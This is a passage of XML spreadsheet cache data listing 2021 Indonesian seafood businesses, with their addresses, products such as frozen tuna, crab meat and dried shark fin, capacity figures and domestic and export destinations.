    <s v="China, Hong Kong, Thailand"/>
  </r>
  <r>
    <n v="24208"/>
    <x v="994"/>
    <s v="PT. KELOLA MINA LAUT"/>
    <s v="Jl. Industri Modern III Kav 12 Kawasan Industri Modern Cikande, Kel. Nambo Ilir, Kec. Kibin, Kabupaten Serang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Rajungan Pasteurisasi"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24212"/>
    <x v="995"/>
    <s v="PT. OCEAN CHAMP SEAFOOD"/>
    <s v="Jl. Kima 7 Kav J-2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Daging Rajungan Pasteurisasi"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="374400"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24218"/>
    <x v="219"/>
    <s v="PT. SUMBER MINA BAHARI"/>
    <s v="Jl. Raya Rembang - Tuban KM 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Teri Beku"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="82757"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24219"/>
    <x v="219"/>
    <s v="PT. SUMBER MINA BAHARI"/>
    <s v="Jl. Raya Rembang - Tuban KM 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Rajungan Beku"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="946653"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24220"/>
    <x v="219"/>
    <s v="PT. SUMBER MINA BAHARI"/>
    <s v="Jl. Raya Rembang - Tuban KM 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Bawal, Malong, Gulama, Kakap, Kurisi, Kerapu)"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24221"/>
    <x v="219"/>
    <s v="PT. SUMBER MINA BAHARI"/>
    <s v="Jl. Raya Rembang - Tuban KM 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="5828"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24222"/>
    <x v="219"/>
    <s v="PT. SUMBER MINA BAHARI"/>
    <s v="Jl. Raya Rembang - Tuban KM 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Tongkol, Cakalang, Tenggiri)"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="40109"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24223"/>
    <x v="219"/>
    <s v="PT. SUMBER MINA BAHARI"/>
    <s v="Jl. Raya Rembang - Tuban KM 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="11880"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24224"/>
    <x v="219"/>
    <s v="PT. SUMBER MINA BAHARI"/>
    <s v="Jl. Raya Rembang - Tuban KM 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="225500"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24225"/>
    <x v="219"/>
    <s v="PT. SUMBER MINA BAHARI"/>
    <s v="Jl. Raya Rembang - Tuban KM 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Capit dan Cangkang Rajungan Rebus Beku"/>
    <d v="2021-05-04T00:00:00"/>
    <n v="3830"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24226"/>
    <x v="996"/>
    <s v="PT. MAQPRO BIOTECH INDONESIA"/>
    <s v="Jl. Raya Desa Jiken Blok I No.8, Kel. Jiken, Kec. Tulangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Minyak Ikan"/>
    <d v="2021-05-27T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Timur, Kota Surabaya, Kota Tangerang"/>
    <s v="Japan, Malaysia"/>
  </r>
  <r>
    <n v="24227"/>
    <x v="997"/>
    <s v="CV. KARYA MURNI"/>
    <s v="Kampung Parang, Dusun Jonggo Batu, Kel. Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="24228"/>
    <x v="997"/>
    <s v="CV. KARYA MURNI"/>
    <s v="Kampung Parang, Dusun Jonggo Batu, Kel. Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Perut Ikan Kering"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24229"/>
    <x v="997"/>
    <s v="CV. KARYA MURNI"/>
    <s v="Kampung Parang, Dusun Jonggo Batu, Kel. Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Abalone Kering"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24230"/>
    <x v="997"/>
    <s v="CV. KARYA MURNI"/>
    <s v="Kampung Parang, Dusun Jonggo Batu, Kel. Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Teripang Kering"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24231"/>
    <x v="997"/>
    <s v="CV. KARYA MURNI"/>
    <s v="Kampung Parang, Dusun Jonggo Batu, Kel. Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Teripang Beku"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="24232"/>
    <x v="998"/>
    <s v="PT. MAKMUR JAYA SEJAHTETRA"/>
    <s v="Jl. Ikan Tuna IV, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Amberjack, Lemuru, Deho, Escolar, Lemadang)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, Italy, United States"/>
  </r>
  <r>
    <n v="24233"/>
    <x v="998"/>
    <s v="PT. MAKMUR JAYA SEJAHTETRA"/>
    <s v="Jl. Ikan Tuna IV, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Amberjack, Lemuru, Escolar, Lemadang, Meka)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, Italy, Japan, United States"/>
  </r>
  <r>
    <n v="24234"/>
    <x v="998"/>
    <s v="PT. MAKMUR JAYA SEJAHTETRA"/>
    <s v="Jl. Ikan Tuna IV, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Kerisi, Lencam, Kerapu, Kakatua, Kakap)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, Italy, United States"/>
  </r>
  <r>
    <n v="24235"/>
    <x v="998"/>
    <s v="PT. MAKMUR JAYA SEJAHTETRA"/>
    <s v="Jl. Ikan Tuna IV, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Kerisi, Lencam, Kerapu, Kakatua, Kakap)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24236"/>
    <x v="998"/>
    <s v="PT. MAKMUR JAYA SEJAHTETRA"/>
    <s v="Jl. Ikan Tuna IV, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Australia, Italy, Japan, United States"/>
  </r>
  <r>
    <n v="24237"/>
    <x v="998"/>
    <s v="PT. MAKMUR JAYA SEJAHTETRA"/>
    <s v="Jl. Ikan Tuna IV, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24238"/>
    <x v="998"/>
    <s v="PT. MAKMUR JAYA SEJAHTETRA"/>
    <s v="Jl. Ikan Tuna IV, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="24239"/>
    <x v="998"/>
    <s v="PT. MAKMUR JAYA SEJAHTETRA"/>
    <s v="Jl. Ikan Tuna IV, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Gurita Rebus Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="Australia, Italy, United States"/>
  </r>
  <r>
    <n v="24241"/>
    <x v="841"/>
    <s v="PT. INDOJOY FORTUNA"/>
    <s v="Jl. Muara Baru Ujung Blok O Kav 3 &amp; 4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2021-02-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24246"/>
    <x v="937"/>
    <s v="PT, SUMBER NELAYAN INDONESIA"/>
    <s v="Dusun V, Kel, Sei Lunang, Kec, Sei Kepayang Timur, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Terasi Udang Basah"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Lampung Barat, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bogor, Kota Bekasi, Kabupaten Gunung Kidul, Kabupaten Sleman, Kabupaten Sidoarjo, Kota Surabaya, Kota Tangerang, Kota Tangerang Selatan, Kota Banjarmasin, Kota Samarinda"/>
    <s v="Brunei Darussalam, Cambodia, China, Lao People's Democratic Republic, Malaysia, Myanmar, Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24248"/>
    <x v="999"/>
    <s v="PT. INDOCITRA JAYA SAMUDERA"/>
    <s v="Jl. Gatot Kaca No.88, Kel. Pengambengan, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Sarden Kaleng, Makerel Kaleng"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="3586000"/>
    <s v="Kota Jakarta Selatan, Kota Semarang, Kota Surabaya"/>
    <s v="Timor-Leste"/>
  </r>
  <r>
    <n v="24249"/>
    <x v="360"/>
    <s v="PT. MULTI PRAWN INDONESIA"/>
    <s v="Jl. Gatot Subroto, Kel. Karangbong, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Layur, Layaran, Selar, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Australia, Korea, Democratic People's Republic of, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24250"/>
    <x v="1000"/>
    <s v="PT, BINTANG MANDIRI BERSAUDARA"/>
    <s v="Jl, Tandurusa Pantai Kecil, Kel, Aertembaga Dua, Kec, Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Lemadang, Layang, Cakalang)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="5500000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24251"/>
    <x v="1000"/>
    <s v="PT, BINTANG MANDIRI BERSAUDARA"/>
    <s v="Jl, Tandurusa Pantai Kecil, Kel, Aertembaga Dua, Kec, Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Lemadang, Layang, Cakalang)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="5500000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24252"/>
    <x v="1001"/>
    <s v="PT. MITRA TIMUR NUSANTARA"/>
    <s v="Jl. Sultan Abdullah Raya Lr 3 No.9, Kel. Buloa, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Katamba, Pisang-pisang, Kerapu, Kakatua, Pinjalo, Kakap, Kaci-kaci, Guntur)"/>
    <d v="2021-03-18T00:00:00"/>
    <n v="118000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia, Hong Kong, Japan, Mexico, United States"/>
  </r>
  <r>
    <n v="24253"/>
    <x v="1001"/>
    <s v="PT. MITRA TIMUR NUSANTARA"/>
    <s v="Jl. Sultan Abdullah Raya Lr 3 No.9, Kel. Buloa, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2021-03-18T00:00:00"/>
    <n v="2700"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24254"/>
    <x v="1001"/>
    <s v="PT. MITRA TIMUR NUSANTARA"/>
    <s v="Jl. Sultan Abdullah Raya Lr 3 No.9, Kel. Buloa, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-18T00:00:00"/>
    <n v="80000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia, Japan, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24255"/>
    <x v="1001"/>
    <s v="PT. MITRA TIMUR NUSANTARA"/>
    <s v="Jl. Sultan Abdullah Raya Lr 3 No.9, Kel. Buloa, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-18T00:00:00"/>
    <n v="96000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia, Japan, Mexico, United States"/>
  </r>
  <r>
    <n v="24256"/>
    <x v="1001"/>
    <s v="PT. MITRA TIMUR NUSANTARA"/>
    <s v="Jl. Sultan Abdullah Raya Lr 3 No.9, Kel. Buloa, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-03-18T00:00:00"/>
    <n v="3500"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia, Hong Kong"/>
  </r>
  <r>
    <n v="24257"/>
    <x v="1002"/>
    <s v="SAKURA"/>
    <s v="Lorong Enok, Kel. Kuala Enok, Kec. Tanah Merah, Kabupaten Indragiri Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Ebi Kering"/>
    <d v="2021-02-10T00:00:00"/>
    <n v="2160"/>
    <s v="Kota Tanjung Balai, Kabupaten Indragiri Hilir"/>
    <m/>
  </r>
  <r>
    <n v="24259"/>
    <x v="735"/>
    <s v="PT. NUANSA ALAM ABADI"/>
    <s v="Jl. Pasir Putih Raya Kav 1, Ancol Timur RT 003 RW 010, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-05-20T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="24260"/>
    <x v="1003"/>
    <s v="CV. INDOJAYA MAKMURABADI"/>
    <s v="Jl. Patimura No.09, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Salem, Makerel Atlantik)"/>
    <d v="2021-04-08T00:00:00"/>
    <n v="5000000"/>
    <s v="Kabupaten Bangkalan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24261"/>
    <x v="1003"/>
    <s v="CV. INDOJAYA MAKMURABADI"/>
    <s v="Jl. Patimura No.09, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kerapu)"/>
    <d v="2021-04-08T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Bangkalan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24262"/>
    <x v="1003"/>
    <s v="CV. INDOJAYA MAKMURABADI"/>
    <s v="Jl. Patimura No.09, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-08T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Viet Nam"/>
  </r>
  <r>
    <n v="24263"/>
    <x v="1003"/>
    <s v="CV. INDOJAYA MAKMURABADI"/>
    <s v="Jl. Patimura No.09, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Cumi-Cumi)"/>
    <d v="2021-04-08T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24264"/>
    <x v="19"/>
    <s v="PT. SEAFOOD SUMATERA PERKASA"/>
    <s v="Jl. Titi Pahlawan No.38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Air Tawar Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="24265"/>
    <x v="19"/>
    <s v="PT. SEAFOOD SUMATERA PERKASA"/>
    <s v="Jl. Titi Pahlawan No 38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="24266"/>
    <x v="19"/>
    <s v="PT. SEAFOOD SUMATERA PERKASA"/>
    <s v="Jl. Titi Pahlawan No.38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="24267"/>
    <x v="19"/>
    <s v="PT. SEAFOOD SUMATERA PERKASA"/>
    <s v="Jl. Titi Pahlawan No.38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Teri, Barakuda, Tongkol, Lemadang, Layang, Tenggiri, Selar Kuning, Cakalang)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="24268"/>
    <x v="19"/>
    <s v="PT. SEAFOOD SUMATERA PERKASA"/>
    <s v="Jl. Titi Pahlawan No.38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="24269"/>
    <x v="19"/>
    <s v="PT. SEAFOOD SUMATERA PERKASA"/>
    <s v="Jl. Titi Pahlawan No.38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Air Tawar Beku (Patin, Lele, Jurung, Betutu, Nila)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="24270"/>
    <x v="1004"/>
    <s v="UD. RIKI UTAMA MANDIRI"/>
    <s v="Kawasan Industri dan Pergudangan Safe N Lock V2-3328, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Hiu Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surakarta, Kota Semarang, Kota Yogyakarta, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Denpasar, Kota Banjarmasin, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24271"/>
    <x v="1004"/>
    <s v="UD. RIKI UTAMA MANDIRI"/>
    <s v="Kawasan Industri dan Pergudangan Safe N Lock V2-3328, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Mas, Gurami, Mujair, Patin, Nila)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surakarta, Kota Semarang, Kota Yogyakarta, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Denpasar, Kota Banjarmasin, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24272"/>
    <x v="1004"/>
    <s v="UD. RIKI UTAMA MANDIRI"/>
    <s v="Kawasan Industri dan Pergudangan Safe N Lock V2-3328, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surakarta, Kota Semarang, Kota Yogyakarta, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Denpasar, Kota Banjarmasin, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24273"/>
    <x v="1004"/>
    <s v="UD. RIKI UTAMA MANDIRI"/>
    <s v="Kawasan Industri dan Pergudangan Safe N Lock V2-3328, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Barramundi, Bawal, Kod, Manyung, Kuwe, Kerapu, Kakatua, Kakap)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surakarta, Kota Semarang, Kota Yogyakarta, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Denpasar, Kota Banjarmasin, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24274"/>
    <x v="1004"/>
    <s v="UD. RIKI UTAMA MANDIRI"/>
    <s v="Kawasan Industri dan Pergudangan Safe N Lock V2-3328, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Kembung, Lemadang, Gindara, Salem, Cakalang, Tenggiri)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surakarta, Kota Semarang, Kota Yogyakarta, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Denpasar, Kota Banjarmasin, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24275"/>
    <x v="1004"/>
    <s v="UD. RIKI UTAMA MANDIRI"/>
    <s v="Kawasan Industri dan Pergudangan Safe N Lock V2-3328, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surakarta, Kota Semarang, Kota Yogyakarta, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Denpasar, Kota Banjarmasin, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24276"/>
    <x v="1005"/>
    <s v="PT. PANORAMA LAUT INDAH"/>
    <s v="Jl. Lintas Parado, Kel. Naru, Kec. Woha, Kabupaten Bima&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24277"/>
    <x v="346"/>
    <s v="PT, ARUMIA KHARISMA INDONESIA"/>
    <s v="Jl, Tongkol Komplek Kantor Pelabuhan Perikanan Donggala, Kel, Labuan Bajo, Kec, Banawa, Kabupaten Donggala&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Tuna Loin Segar"/>
    <d v="2021-06-14T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24281"/>
    <x v="1006"/>
    <s v="CV. REZEKI KITA"/>
    <s v="Jl. Raya Gabion Lorong Sawita No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kuring, Selayang, Selar, Aso-aso, Tenggiri, Salem)"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="600000"/>
    <s v="Kabupaten Tapanuli Tengah, Kabupaten Labuhan Batu, Kabupaten Deli Serdang, Kabupaten Langkat, Kota Sibolga, Kota Medan, Kota Binjai, Kota Pekanbaru, Kota Jambi, Kota Palembang"/>
    <m/>
  </r>
  <r>
    <n v="24287"/>
    <x v="1007"/>
    <s v="PT. KURNIA MITRA MAKMUR PURWAKARTA"/>
    <s v="Jl. Cinta Karya No.172 RT 011 RW 005, Kel. Cikopo, Kec. Bungursari, Kabupaten Purwakarta&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
